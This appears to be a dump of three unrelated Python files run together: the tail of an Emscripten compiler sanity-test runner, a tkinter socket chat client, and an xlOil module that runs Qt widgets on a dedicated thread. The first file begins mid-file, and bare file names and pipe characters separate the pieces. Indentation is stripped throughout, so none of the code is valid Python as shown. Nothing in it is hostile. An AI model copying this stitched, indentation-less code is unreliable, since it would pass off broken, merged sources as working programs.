sys.argv = filter(lambda x: x != 'sanity', sys.argv)
print
print 'Running sanity checks.'
print 'WARNING: This will modify %s, and in theory can break it although it should be restored properly. A backup will be saved in %s_backup' % (EM_CONFIG, EM_CONFIG)
print
assert os.path.exists(CONFIG_FILE), 'To run these tests, we need a (working!) %s file to already exist' % EM_CONFIG
assert not os.environ.get('EMCC_DEBUG'), 'do not run sanity checks in debug mode!'
shutil.copyfile(CONFIG_FILE, CONFIG_FILE + '_backup')
def restore():
shutil.copyfile(CONFIG_FILE + '_backup', CONFIG_FILE)
SANITY_FILE = CONFIG_FILE + '_sanity'
def wipe():
try_delete(CONFIG_FILE)
try_delete(SANITY_FILE)
commands = [[EMCC], [PYTHON, path_from_root('tests', 'runner.py'), 'blahblah']]
def mtime(filename):
return os.stat(filename).st_mtime
class sanity(RunnerCore):
def setUp(self):
wipe()
def tearDown(self):
restore()
def do(self, command):
if type(command) is not list:
command = [command]
if command[0] == EMCC:
command = [PYTHON] + command
return Popen(command, stdout=PIPE, stderr=STDOUT).communicate()[0]
def check_working(self, command, expected=None):
if type(command) is not list:
command = [command]
if expected is None:
if command[0] == EMCC:
expected = 'no input files'
else:
expected = "has no attribute 'blahblah'"
output = self.do(command)
self.assertContained(expected, output)
return output
def test_aaa_normal(self): # this should be the very first thing that runs. if this fails, everything else is irrelevant!
for command in commands:
# Your existing EM_CONFIG should work!
restore()
self.check_working(command)
def test_firstrun(self):
for command in commands:
wipe()
def make_executable(name):
with open(os.path.join(temp_bin, name), 'w') as f:
os.fchmod(f.fileno(), stat.S_IRWXU)
try:
temp_bin = tempfile.mkdtemp()
old_environ_path = os.environ['PATH']
os.environ['PATH'] = temp_bin + os.pathsep + old_environ_path
make_executable('llvm-dis')
make_executable('node')
make_executable('python2')
output = self.do(command)
finally:
os.environ['PATH'] = old_environ_path
shutil.rmtree(temp_bin)
self.assertContained('Welcome to Emscripten!', output)
self.assertContained('This is the first time any of the Emscripten tools has been run.', output)
self.assertContained('A settings file has been copied to %s, at absolute path: %s' % (EM_CONFIG, CONFIG_FILE), output)
self.assertContained('It contains our best guesses for the important paths, which are:', output)
self.assertContained('LLVM_ROOT', output)
self.assertContained('NODE_JS', output)
self.assertContained('PYTHON', output)
if platform.system() is not 'Windows':
# os.chmod can't make files executable on Windows
self.assertIdentical(temp_bin, re.search("^ *LLVM_ROOT *= (.*)$", output, re.M).group(1))
self.assertIdentical(os.path.join(temp_bin, 'node'), re.search("^ *NODE_JS *= (.*)$", output, re.M).group(1))
self.assertIdentical(os.path.join(temp_bin, 'python2'), re.search("^ *PYTHON *= (.*)$", output, re.M).group(1))
self.assertContained('Please edit the file if any of those are incorrect', output)
self.assertContained('This command will now exit. When you are done editing those paths, re-run it.', output)
assert output.split()[-1].endswith('===='), 'We should have stopped: ' + output
config_file = open(CONFIG_FILE).read()
template_file = open(path_from_root('tools', 'settings_template_readonly.py')).read()
self.assertNotContained('~/.emscripten', config_file)
self.assertContained('~/.emscripten', template_file)
self.assertNotContained('{{{', config_file)
self.assertNotContained('}}}', config_file)
self.assertContained('{{{', template_file)
self.assertContained('}}}', template_file)
for content in ['EMSCRIPTEN_ROOT', 'LLVM_ROOT', 'NODE_JS', 'TEMP_DIR', 'COMPILER_ENGINE', 'JS_ENGINES']:
self.assertContained(content, config_file)
# The guessed config should be ok XXX This depends on your local system! it is possible `which` guesses wrong
#try_delete('a.out.js')
#output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world.c')], stdout=PIPE, stderr=PIPE).communicate()
#self.assertContained('hello, world!', run_js('a.out.js'), output)
# Second run, with bad EM_CONFIG
for settings in ['blah', 'LLVM_ROOT="blarg"; JS_ENGINES=[]; COMPILER_ENGINE=NODE_JS=SPIDERMONKEY_ENGINE=[]']:
f = open(CONFIG_FILE, 'w')
f.write(settings)
f.close()
output = self.do(command)
if 'LLVM_ROOT' not in settings:
self.assertContained('Error in evaluating %s' % EM_CONFIG, output)
elif 'runner.py' not in ' '.join(command):
self.assertContained('CRITICAL', output) # sanity check should fail
def test_closure_compiler(self):
CLOSURE_FATAL = 'fatal: Closure compiler'
CLOSURE_WARNING = 'does not exist'
# Sanity check should find closure
restore()
output = self.check_working(EMCC)
self.assertNotContained(CLOSURE_FATAL, output)
self.assertNotContained(CLOSURE_WARNING, output)
# Append a bad path for closure, will warn
f = open(CONFIG_FILE, 'a')
f.write('CLOSURE_COMPILER = "/tmp/nowhere/nothingtoseehere/kjadsfkjwelkjsdfkqgas/nonexistent.txt"\n')
f.close()
output = self.check_working(EMCC, CLOSURE_WARNING)
# And if you actually try to use the bad path, will be fatal
f = open(CONFIG_FILE, 'a')
f.write('CLOSURE_COMPILER = "/tmp/nowhere/nothingtoseehere/kjadsfkjwelkjsdfkqgas/nonexistent.txt"\n')
f.close()
output = self.check_working([EMCC, '-O2', '-s', 'ASM_JS=0', '--closure', '1', 'tests/hello_world.cpp'], CLOSURE_FATAL)
# With a working path, all is well
restore()
try_delete('a.out.js')
output = self.check_working([EMCC, '-O2', '-s', 'ASM_JS=0', '--closure', '1', 'tests/hello_world.cpp'], '')
assert os.path.exists('a.out.js'), output
def test_llvm(self):
LLVM_WARNING = 'LLVM version appears incorrect'
restore()
# Clang should report the version number we expect, and emcc should not warn
assert check_clang_version()
output = self.check_working(EMCC)
assert LLVM_WARNING not in output, output
# Fake a different llvm version
restore()
f = open(CONFIG_FILE, 'a')
f.write('LLVM_ROOT = "' + path_from_root('tests', 'fake') + '"')
f.close()
if not os.path.exists(path_from_root('tests', 'fake')):
os.makedirs(path_from_root('tests', 'fake'))
try:
os.environ['EM_IGNORE_SANITY'] = '1'
for x in range(-2, 3):
for y in range(-2, 3):
f = open(path_from_root('tests', 'fake', 'clang'), 'w')
f.write('#!/bin/sh\n')
f.write('echo "clang version %d.%d" 1>&2\n' % (EXPECTED_LLVM_VERSION[0] + x, EXPECTED_LLVM_VERSION[1] + y))
f.close()
shutil.copyfile(path_from_root('tests', 'fake', 'clang'), path_from_root('tests', 'fake', 'clang++'))
os.chmod(path_from_root('tests', 'fake', 'clang'), stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
os.chmod(path_from_root('tests', 'fake', 'clang++'), stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
if x != 0 or y != 0:
output = self.check_working(EMCC, LLVM_WARNING)
else:
output = self.check_working(EMCC)
assert LLVM_WARNING not in output, output
finally:
del os.environ['EM_IGNORE_SANITY']
def test_node(self):
NODE_WARNING = 'node version appears too old'
NODE_WARNING_2 = 'cannot check node version'
restore()
# Clang should report the version number we expect, and emcc should not warn
assert check_node_version()
output = self.check_working(EMCC)
assert NODE_WARNING not in output, output
# Fake a different node version
restore()
f = open(CONFIG_FILE, 'a')
f.write('NODE_JS = "' + path_from_root('tests', 'fake', 'nodejs') + '"')
f.close()
if not os.path.exists(path_from_root('tests', 'fake')):
os.makedirs(path_from_root('tests', 'fake'))
try:
os.environ['EM_IGNORE_SANITY'] = '1'
for version, succeed in [('v0.7.9', False), ('v0.8.0', True), ('v0.8.1', True), ('cheez', False)]:
f = open(path_from_root('tests', 'fake', 'nodejs'), 'w')
f.write('#!/bin/sh\n')
f.write('''if [ $1 = "--version" ]; then
echo "%s"
else
%s $@
fi
''' % (version, NODE_JS))
f.close()
os.chmod(path_from_root('tests', 'fake', 'nodejs'), stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
if not succeed:
if version[0] == 'v':
self.check_working(EMCC, NODE_WARNING)
else:
self.check_working(EMCC, NODE_WARNING_2)
else:
output = self.check_working(EMCC)
assert NODE_WARNING not in output, output
finally:
del os.environ['EM_IGNORE_SANITY']
def test_emcc(self):
SANITY_MESSAGE = 'Emscripten: Running sanity checks'
SANITY_FAIL_MESSAGE = 'sanity check failed to run'
# emcc should check sanity if no ${EM_CONFIG}_sanity
restore()
time.sleep(0.1)
assert not os.path.exists(SANITY_FILE) # restore is just the settings, not the sanity
output = self.check_working(EMCC)
self.assertContained(SANITY_MESSAGE, output)
assert os.path.exists(SANITY_FILE) # EMCC should have checked sanity successfully
assert mtime(SANITY_FILE) >= mtime(CONFIG_FILE)
assert generate_sanity() == open(SANITY_FILE).read()
self.assertNotContained(SANITY_FAIL_MESSAGE, output)
# emcc run again should not sanity check, because the sanity file is newer
output = self.check_working(EMCC)
self.assertNotContained(SANITY_MESSAGE, output)
self.assertNotContained(SANITY_FAIL_MESSAGE, output)
# correct sanity contents mean we need not check
open(SANITY_FILE, 'w').write(generate_sanity())
output = self.check_working(EMCC)
self.assertNotContained(SANITY_MESSAGE, output)
# incorrect sanity contents mean we *must* check
open(SANITY_FILE, 'w').write('wakawaka')
output = self.check_working(EMCC)
self.assertContained(SANITY_MESSAGE, output)
# but with EMCC_DEBUG=1 we should check
try:
os.environ['EMCC_DEBUG'] = '1'
output = self.check_working(EMCC)
finally:
del os.environ['EMCC_DEBUG']
self.assertContained(SANITY_MESSAGE, output)
output = self.check_working(EMCC)
self.assertNotContained(SANITY_MESSAGE, output)
# Make sure the test runner didn't do anything to the setup
output = self.check_working(EMCC)
self.assertNotContained(SANITY_MESSAGE, output)
self.assertNotContained(SANITY_FAIL_MESSAGE, output)
# emcc should also check sanity if the file is outdated
time.sleep(0.1)
restore()
assert mtime(SANITY_FILE) < mtime(CONFIG_FILE)
output = self.check_working(EMCC)
self.assertContained(SANITY_MESSAGE, output)
assert mtime(SANITY_FILE) >= mtime(CONFIG_FILE)
self.assertNotContained(SANITY_FAIL_MESSAGE, output)
# emcc should be configurable directly from EM_CONFIG without any config file
restore()
config = open(CONFIG_FILE, 'r').read()
os.environ['EM_CONFIG'] = config
wipe()
dirname = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=TEMP_DIR)
open(os.path.join(dirname, 'main.cpp'), 'w').write('''
#include <stdio.h>
int main() {
printf("hello from emcc with no config file\\n");
return 0;
}
''')
Popen([PYTHON, EMCC, os.path.join(dirname, 'main.cpp'), '-o', os.path.join(dirname, 'a.out.js')]).communicate()
del os.environ['EM_CONFIG']
old_dir = os.getcwd()
try:
os.chdir(dirname)
self.assertContained('hello from emcc with no config file', run_js('a.out.js'))
finally:
os.chdir(old_dir)
shutil.rmtree(dirname)
try_delete(CANONICAL_TEMP_DIR)
def test_emcc_caching(self):
INCLUDING_MESSAGE = 'including X'
BUILDING_MESSAGE = 'building X for cache'
ERASING_MESSAGE = 'clearing cache'
EMCC_CACHE = Cache.dirname
for compiler in [EMCC, EMXX]:
print compiler
restore()
Cache.erase()
assert not os.path.exists(EMCC_CACHE)
try:
os.environ['EMCC_DEBUG'] ='1'
self.working_dir = os.path.join(TEMP_DIR, 'emscripten_temp')
# Building a file that doesn't need cached stuff should not trigger cache generation
output = self.do([compiler, path_from_root('tests', 'hello_world.cpp')])
assert INCLUDING_MESSAGE.replace('X', 'libc') not in output
assert BUILDING_MESSAGE.replace('X', 'libc') not in output
self.assertContained('hello, world!', run_js('a.out.js'))
assert not os.path.exists(EMCC_CACHE)
try_delete('a.out.js')
basebc_name = os.path.join(TEMP_DIR, 'emscripten_temp', 'emcc-0-basebc.bc')
dcebc_name = os.path.join(TEMP_DIR, 'emscripten_temp', 'emcc-1-linktime.bc')
ll_names = [os.path.join(TEMP_DIR, 'emscripten_temp', 'emcc-X-ll.ll').replace('X', str(x)) for x in range(2,5)]
# Building a file that *does* need dlmalloc *should* trigger cache generation, but only the first time
for filename, libname in [('hello_malloc.cpp', 'libc'), ('hello_libcxx.cpp', 'libcxx')]:
for i in range(3):
print filename, libname, i
self.clear()
try_delete(basebc_name) # we might need to check this file later
try_delete(dcebc_name) # we might need to check this file later
for ll_name in ll_names: try_delete(ll_name)
output = self.do([compiler, '-O' + str(i), '-s', 'RELOOP=0', '--llvm-lto', '0', path_from_root('tests', filename)])
#print output
assert INCLUDING_MESSAGE.replace('X', libname) in output
if libname == 'libc':
assert INCLUDING_MESSAGE.replace('X', 'libcxx') not in output # we don't need libcxx in this code
else:
assert INCLUDING_MESSAGE.replace('X', 'libc') in output # libcxx always forces inclusion of libc
assert (BUILDING_MESSAGE.replace('X', libname) in output) == (i == 0), 'Must only build the first time'
self.assertContained('hello, world!', run_js('a.out.js'))
assert os.path.exists(EMCC_CACHE)
assert os.path.exists(os.path.join(EMCC_CACHE, libname + '.bc'))
if libname == 'libcxx':
print os.stat(os.path.join(EMCC_CACHE, libname + '.bc')).st_size, os.stat(basebc_name).st_size, os.stat(dcebc_name).st_size
assert os.stat(os.path.join(EMCC_CACHE, libname + '.bc')).st_size > 1000000, 'libc++ is big'
assert os.stat(basebc_name).st_size > 1000000, 'libc++ is indeed big'
assert os.stat(dcebc_name).st_size < 500000, 'Dead code elimination must remove most of libc++'
# should only have metadata in -O0, not 1 and 2
if i > 0:
for ll_name in ll_names:
ll = None
try:
ll = open(ll_name).read()
break
except:
pass
assert ll
assert ll.count('\n!') < 10 # a few lines are left even in -O1 and -O2
finally:
del os.environ['EMCC_DEBUG']
# Manual cache clearing
assert os.path.exists(EMCC_CACHE)
output = self.do([EMCC, '--clear-cache'])
assert ERASING_MESSAGE in output
assert not os.path.exists(EMCC_CACHE)
try_delete(CANONICAL_TEMP_DIR)
def test_relooper(self):
RELOOPER = Cache.get_path('relooper.js')
restore()
for phase in range(2): # 0: we wipe the relooper dir. 1: we have it, so should just update
if phase == 0: Cache.erase()
try_delete(RELOOPER)
for i in range(4):
print >> sys.stderr, phase, i
opt = min(i, 2)
try_delete('a.out.js')
output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_loop.cpp'), '-O' + str(opt), '-g'],
stdout=PIPE, stderr=PIPE).communicate()
self.assertContained('hello, world!', run_js('a.out.js'))
output = '\n'.join(output)
assert ('bootstrapping relooper succeeded' in output) == (i == 2), 'only bootstrap on first O2: ' + output
assert os.path.exists(RELOOPER) == (i >= 2), 'have relooper on O2: ' + output
src = open('a.out.js').read()
main = src.split('function _main()')[1].split('\n}\n')[0]
assert ('while (1) {' in main or 'while(1){' in main or '} while ($' in main or '}while($' in main) == (i >= 2), 'reloop code on O2: ' + main
assert ('switch' not in main) == (i >= 2), 'reloop code on O2: ' + main
def test_jcache(self):
PRE_LOAD_MSG = 'loading pre from jcache'
PRE_SAVE_MSG = 'saving pre to jcache'
FUNC_CHUNKS_LOAD_MSG = ' funcchunks from jcache'
FUNC_CHUNKS_SAVE_MSG = ' funcchunks to jcache'
JSFUNC_CHUNKS_LOAD_MSG = 'jsfuncchunks from jcache'
JSFUNC_CHUNKS_SAVE_MSG = 'jsfuncchunks to jcache'
restore()
Cache.erase()
try:
os.environ['EMCC_DEBUG'] = '1'
os.environ['EMCC_JSOPT_MIN_CHUNK_SIZE'] = str(1024*512)
self.working_dir = os.path.join(TEMP_DIR, 'emscripten_temp')
if not os.path.exists(self.working_dir): os.makedirs(self.working_dir)
assert not os.path.exists(JCache.get_cachename('emscript_files'))
srcs = {}
used_jcache = False
for args, input_file, expect_pre_save, expect_pre_load, expect_funcs_save, expect_funcs_load, expect_jsfuncs_save, expect_jsfuncs_load, expected in [
([], 'hello_world_loop.cpp', False, False, False, False, False, False, []),
(['--jcache'], 'hello_world_loop.cpp', True, False, True, False, True, False, []),
(['--jcache'], 'hello_world_loop.cpp', False, True, False, True, False, True, []),
([], 'hello_world_loop.cpp', False, False, False, False, False, False, []),
# new
([], 'hello_world.cpp', False, False, False, False, False, False, []),
(['--jcache'], 'hello_world.cpp', True, False, True, False, True, False, []),
(['--jcache'], 'hello_world.cpp', False, True, False, True, False, True, []),
([], 'hello_world.cpp', False, False, False, False, False, False, []),
# go back to old file, experience caching
(['--jcache'], 'hello_world_loop.cpp', False, True, False, True, False, True, []),
# new, large file
([], 'hello_malloc.cpp', False, False, False, False, False, False, []),
(['--jcache'], 'hello_malloc.cpp', True, False, True, False, True, False, []),
(['--jcache'], 'hello_malloc.cpp', False, True, False, True, False, True, []),
([], 'hello_malloc.cpp', False, False, False, False, False, False, []),
# new, huge file
([], 'hello_libcxx.cpp', False, False, False, False, False, False, ('3 chunks',)),
(['--jcache'], 'hello_libcxx.cpp', True, False, True, False, True, False, []),
(['--jcache'], 'hello_libcxx.cpp', False, True, False, True, False, True, []),
([], 'hello_libcxx.cpp', False, False, False, False, False, False, []),
# finally, build a file close to the previous, to see that some chunks are found in the cache and some not
(['--jcache'], 'hello_libcxx_mod1.cpp', False, True, True, True, True, True, []), # win on pre, mix on funcs, mix on jsfuncs
(['--jcache'], 'hello_libcxx_mod1.cpp', False, True, False, True, False, True, []),
(None, None, None, None, None, None, None, None, None), # clear
(['--jcache'], 'hello_libcxx_mod2.cpp', True, False, True, False, True, False, []), # load into cache
(['--jcache'], 'hello_libcxx_mod2a.cpp', False, True, True, True, True, True, []) # add a printf, do not lose everything
]:
self.clear()
if args is None:
Cache.erase()
continue
print >> sys.stderr, args, input_file, expect_pre_save, expect_pre_load, expect_funcs_save, expect_funcs_load, expect_jsfuncs_save, expect_jsfuncs_load, expected
out, err = Popen([PYTHON, EMCC, '-O2', '-g', path_from_root('tests', input_file)] + args, stdout=PIPE, stderr=PIPE).communicate()
errtail = err.split('emcc invocation')[-1]
self.assertContained('hello, world!', run_js('a.out.js'), errtail)
assert (PRE_SAVE_MSG in err) == expect_pre_save, errtail
assert (PRE_LOAD_MSG in err) == expect_pre_load, errtail
assert (FUNC_CHUNKS_SAVE_MSG in err) == expect_funcs_save, errtail
assert (FUNC_CHUNKS_LOAD_MSG in err) == expect_funcs_load, errtail
assert (JSFUNC_CHUNKS_SAVE_MSG in err) == expect_jsfuncs_save, errtail
assert (JSFUNC_CHUNKS_LOAD_MSG in err) == expect_jsfuncs_load, errtail
for expect in expected: assert expect in err, expect + ' ? ' + errtail
curr = open('a.out.js').read()
if input_file not in srcs:
srcs[input_file] = curr
else:
#open('/home/alon/Dev/emscripten/a', 'w').write(srcs[input_file])
#open('/home/alon/Dev/emscripten/b', 'w').write(curr)
assert abs(len(curr)/float(len(srcs[input_file]))-1)<0.01, 'contents may shift in order, but must remain the same size %d vs %d' % (len(curr), len(srcs[input_file])) + '\n' + errtail
used_jcache = used_jcache or ('--jcache' in args)
assert used_jcache == os.path.exists(JCache.get_cachename('emscript_files'))
#print >> sys.stderr, errtail
finally:
del os.environ['EMCC_DEBUG']
del os.environ['EMCC_JSOPT_MIN_CHUNK_SIZE']
else:
raise Exception('Test runner is confused: ' + str(sys.argv))
if __name__ == '__main__':
# Sanity checks
total_engines = len(JS_ENGINES)
JS_ENGINES = filter(check_engine, JS_ENGINES)
if len(JS_ENGINES) == 0:
print 'WARNING: None of the JS engines in JS_ENGINES appears to work.'
elif len(JS_ENGINES) < total_engines:
print 'WARNING: Not all the JS engines in JS_ENGINES appears to work, ignoring those.'
# Skip requested tests
for i in range(len(sys.argv)):
arg = sys.argv[i]
if arg.startswith('skip:'):
which = arg.split('skip:')[1]
if which.startswith('ALL.'):
ignore, test = which.split('.')
which = map(lambda mode: mode+'.'+test, test_modes)
else:
which = [which]
print >> sys.stderr, ','.join(which)
for test in which:
print >> sys.stderr, 'will skip "%s"' % test
exec(test + ' = RunnerCore.skipme')
sys.argv[i] = ''
sys.argv = filter(lambda arg: arg, sys.argv)
# Go
unittest.main(verbosity=2)
|
main.py
|
# Importing the modules
from tkinter import *
from tkinter.font import BOLD
import socket
import threading
import random
import csv
import pygame
r = lambda: random.randint(0, 255)
color = '#%02X%02X%02X' % (r(), r(), r())
# client connections
PORT = 5000
SERVER = "192.168.56.1"
ADDRESS = (SERVER, PORT)
FORMAT = "utf-8"
# Create a new client socket
# and connect to the server
client = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
client.connect(ADDRESS)
# making the GUI
class GUI:
"""
<summary>
This is the main class fot the GUI.
</summary>
<functions>
continue_ahead()
chatroom()
send_button()
message_from_server()
message_to_server()
update_database()
play_sound()
setting_window()
change_color_window()
</functions>
"""
def __init__(self):
""" <summary>
Main Constructor.
</summary>
<param>
***No params***
</param>
"""
self.root = Tk()
self.root.withdraw()
self.sign_up = Toplevel()
self.sign_up.geometry('300x300')
self.please_detials = Label(self.sign_up,
text="Please sign_up to continue",
font=('Arial', 8, BOLD))
self.please_detials.place(x=90, y=100)
self.name_label = Label(self.sign_up,
text="Name: ",
font=('Arial', 8, BOLD))
self.name_label.place(x=50, y=130)
self.input_box = Entry(self.sign_up,
highlightthickness=2)
self.input_box.place(x=100, y=130)
self.input_box.focus()
self.continue_button = Button(self.sign_up,
text="Continue",
height=2,
width=10,
bg='grey',
fg='white',
command=lambda: self.continue_ahead(self.input_box.get()))
self.continue_button.place(relx=0.4, rely=0.55)
self.root.mainloop()
def continue_ahead(self, name):
"""
<summary>
its the main login controller.
</summary>
:param name: takes the name to display on function CHATROOM.
:return: Null
"""
self.sign_up.destroy()
self.chatroom(name)
recieve = threading.Thread(target=self.message_from_server)
recieve.start()
def chatroom(self, name):
"""
<summary>
This is the main function for the chatroom that will
control the chat and will display some buttons and chat fields.
</summary>
:param name: takes the name to display on the top.
:return: Null
"""
self.user_name = name
self.root.deiconify()
self.root.geometry('470x550')
self.root.configure(bg=color)
self.root.title('CHATROOM')
self.heading = Label(self.root,
text=self.user_name,
bg=color,
fg="#EAECEE",
font="Helvetica 13 bold",
pady=5)
self.heading.pack()
try:
self.photo = PhotoImage(file=r"assets/black-settings-button.png")
except IOError as e:
print("there is an error, you don't have the assets folder or forgot to change the path.")
self.settings_button = Button(self.root, image=self.photo, pady=5, command=self.setting_window)
self.settings_button.place(relx=0.9, rely=0.02)
self.space_for_message = Text(self.root,
width=20,
height=2,
bg="#17202A",
fg="#EAECEE",
font="Helvetica 14",
padx=5,
pady=5)
self.space_for_message.place(relheight=0.745,
relwidth=1,
rely=0.08)
self.bottom_design = Label(self.root,
bg="#ABB2B9",
height=40)
self.bottom_design.place(relwidth=1,
rely=0.925)
self.message_input = Entry(self.bottom_design,
bg="#616A6B",
fg="#000000",
font="Helvetica 13")
self.message_input.place(relwidth=0.74,
relheight=0.04,
rely=0.008,
relx=0.011)
self.message_input.focus()
self.send_button = Button(self.bottom_design,
text="Send",
font="Helvetica 10 bold",
width=20, bg="#ABB2B9",
command=lambda: self.sendButton(self.message_input.get()))
self.send_button.place(relx=0.77,
rely=0.008,
relheight=0.04,
relwidth=0.22)
self.scrollbar = Scrollbar(self.space_for_message)
self.scrollbar.place(relheight=1,
relx=0.974)
self.scrollbar.config(command=self.space_for_message.yview)
self.space_for_message.config(state=DISABLED)
def sendButton(self, msg):
"""
<summary>
This function consist of the send button and its code.
</summary>
:param msg: the string written by the user on the text field of the chatroom.
:return: None
"""
self.space_for_message.config(state=DISABLED)
self.msg = msg
self.message_input.delete(0, END)
self.update_database()
self.snd = threading.Thread(target=self.message_to_server)
self.snd.start()
def message_from_server(self):
"""
<summary>
it decodes the string from the server.
</summary>
:return:None
"""
while True:
try:
message = client.recv(1024).decode(FORMAT)
if message == 'NAME':
client.send(self.user_name.encode(FORMAT))
else:
self.play_sound()
self.space_for_message.config(state=NORMAL)
self.space_for_message.insert(END, message + "\n\n")
self.space_for_message.config(state=DISABLED)
self.space_for_message.see(END)
except:
print("there are some issues while connecting to the server, the client will disconnect soon.")
client.close()
break
def message_to_server(self):
"""
<summary>
it decodes the messages to server.
</summary>
:return: None
"""
self.space_for_message.config(state=DISABLED)
while True:
message = (f"{self.user_name}: {self.msg}")
client.send(message.encode(FORMAT))
break
def update_database(self):
"""
<summary>
it updates the database or the data to a .txt file and saves the message.
</summary>
:return: None
"""
try:
rowlist = [[self.user_name, self.msg]]
with open('database.csv', 'a', newline='') as file:
writer = csv.writer(file)
writer.writerows(rowlist)
self.play_sound()
except EXCEPTION as exo:
print("there are some issues while connecting to the database.")
def play_sound(self):
"""
<summary>
it plays a sound when a message is sent or received.
:return: None
"""
pygame.mixer.init()
try:
self.crash_sound = pygame.mixer.Sound("assets/insight-578.mp3")
except IOError as ex:
print("there is an error, you have not downloaded the assets folder or forgot to change the path.")
self.crash_sound.play()
def setting_window(self):
"""
<summary>
This is the main funtion for the setting window.
</summary>
:return: None
"""
self.settings = Tk()
self.settings.geometry('250x250')
Label(self.settings, text="COLOR").pack()
self.color_black = Button(self.settings, bg='black', width=5, height=2,
command=lambda: self.change_color_window('black'))
self.color_black.place(rely=0.1)
self.color_white = Button(self.settings, bg='white', width=5, height=2,
command=lambda: self.change_color_window('white'))
self.color_white.place(rely=0.3)
self.color_red = Button(self.settings, bg='red', width=5, height=2,
command=lambda: self.change_color_window('red'))
self.color_red.place(rely=0.5)
self.color_orange = Button(self.settings, bg='orange', width=5, height=2,
command=lambda: self.change_color_window('orange'))
self.color_orange.place(relx=0.2, rely=0.1)
self.color_blue = Button(self.settings, bg='blue', width=5, height=2,
command=lambda: self.change_color_window('blue'))
self.color_blue.place(relx=0.2, rely=0.3)
self.color_yellow = Button(self.settings, bg='yellow', width=5, height=2,
command=lambda: self.change_color_window('yellow'))
self.color_yellow.place(relx=0.2, rely=0.5)
self.color_unknown = Button(self.settings, bg='#58D68D', width=5, height=2,
command=lambda: self.change_color_window('#58D68D'))
self.color_unknown.place(relx=0.4, rely=0.1)
self.color_unknown2 = Button(self.settings, bg='#A569BD', width=5, height=2,
command=lambda: self.change_color_window('#A569BD'))
self.color_unknown2.place(relx=0.4, rely=0.3)
self.color_unknown3 = Button(
self.settings,
bg='#D35400',
width=5,
height=2,
command=lambda: self.change_color_window('#D35400'))
self.color_unknown3.place(relx=0.4, rely=0.5)
def change_color_window(self, color):
"""
<summary>
this funtion changes the baground color of teh window.
</summary>
:param color: it the color selected by the user from the settings.
:return: None
"""
self.root.configure(bg=color)
self.heading.configure(bg=color)
g = GUI() # creating the object.
|
qtgui.py
|
import threading
import queue
from ._common import *
from . import _core
from .excelgui import CustomTaskPane
import importlib
import sys
import concurrent.futures as futures
import concurrent.futures.thread
def _qt_import(sub, what):
"""
Helper function to import Q objects from PyQt or PySide depending
on which framework had already been imported
"""
if 'PyQt5' in sys.modules:
top = 'PyQt5'
elif 'PySide2' in sys.modules:
top = 'PySide2'
else:
raise ImportError("Import PyQt or PySide before invoking this function")
if isinstance(what, str):
mod = __import__(top + '.' + sub, globals(), locals(), [what], 0)
return getattr(mod, what)
else:
mod = __import__(top + '.' + sub, globals(), locals(), what, 0)
return [getattr(mod, x) for x in what]
def _create_Qt_app():
QApplication = _qt_import('QtWidgets', 'QApplication')
# Qt seems to really battle with reading environment variables. So we must
# read the variable ourselves, then pass it as an argument. It's unclear what
# alchemy is required to make Qt do this seeminly simple thing.
import os
ppp = os.getenv('QT_QPA_PLATFORM_PLUGIN_PATH', None)
app = QApplication([] if ppp is None else ['','-platformpluginpath', ppp])
log(f"Started Qt on thread {threading.get_native_id()}" +
f"with libpaths={app.libraryPaths()}", level="info")
return app
def _reparent_widget(widget, hwnd):
QWindow = _qt_import('QtGui', 'QWindow')
# windowHandle does not exist before show
widget.show()
nativeWindow = QWindow.fromWinId(hwnd)
widget.windowHandle().setParent(nativeWindow)
widget.update()
widget.move(0, 0)
class QtExecutor(futures.Executor):
def __init__(self):
self._work_queue = queue.SimpleQueue()
self._thread = threading.Thread(target=self._main_loop, name="QtGuiThread")
self._broken = False
self._work_signal = None
self._thread.start()
def submit(self, fn, *args, **kwargs):
if self._broken:
raise futures.BrokenExecutor(self._broken)
f = futures.Future()
w = concurrent.futures.thread._WorkItem(f, fn, args, kwargs)
self._work_queue.put(w)
if self._work_signal is not None:
self._work_signal.timeout.emit()
return f
def shutdown(self, wait=True, cancel_futures=False):
if not self._broken:
self.submit(self.app.quit)
def _do_work(self):
try:
while True:
work_item = self._work_queue.get_nowait()
if work_item is not None:
work_item.run()
del work_item
except queue.Empty:
return
def _main_loop(self):
try:
self.app = _create_Qt_app()
QTimer = _qt_import('QtCore', 'QTimer')
semaphore = QTimer()
semaphore.timeout.connect(self._do_work)
self._work_signal = semaphore
# Trigger timer to run any pending queue items now
semaphore.timeout.emit()
# Thread main loop, run until quit
self.app.exec()
# Thread cleanup
self.app = None
self._enqueued = None
self._broken = True
except Exception as e:
self._broken = True
log(f"QtThread failed: {e}", level='error')
_Qt_thread = None
def Qt_thread() -> futures.Executor:
"""
All Qt GUI interactions (except signals) must take place on the thread
that the *QApplication* object was created on. This object is a
*concurrent.futures.Executor* which executes commands on the dedicated
Qt thread. **All Qt interaction must take place via this thread**.
Examples
--------
::
future = Qt_thread().submit(my_func, my_args)
future.result() # blocks
"""
global _Qt_thread
if _Qt_thread is None:
_Qt_thread = QtExecutor()
# PyBye is called before `threading` module teardown, whereas `atexit` comes later
_core.event.PyBye += _Qt_thread.shutdown
# Send this blocking no-op to ensure QApplication is created on our thread
# before we proceed, otherwise Qt may try to create one elsewhere
_Qt_thread.submit(lambda: 0).result()
return _Qt_thread
class QtThreadTaskPane(CustomTaskPane):
"""
Wraps a Qt QWidget to create a CustomTaskPane object.
"""
def __init__(self, pane, draw_widget):
"""
Wraps a QWidget to create a CustomTaskPane object. The ``draw_widget`` function
is executed on the `xloil.qtgui.Qt_thread` and is expected to return a *QWidget* object.
"""
super().__init__(pane)
def draw_it(hwnd):
widget = draw_widget()
_reparent_widget(widget, hwnd)
return widget
self.widget = Qt_thread().submit(draw_it, self.pane.parent_hwnd).result() # Blocks
def on_size(self, width, height):
Qt_thread().submit(lambda: self.widget.resize(width, height))
def on_visible(self, c):
Qt_thread().submit(lambda: self.widget.show() if c else self.widget.hide())
def on_destroy(self):
Qt_thread().submit(lambda: self.widget.destroy())
super().on_destroy()
def _try_create_qt_pane(obj):
try:
QWidget = _qt_import('QtWidgets', 'QWidget')
if issubclass(obj, QWidget):
return lambda pane: QtThreadTaskPane(pane, obj)
except ImportError:
pass
return None
|
bridge.py
|
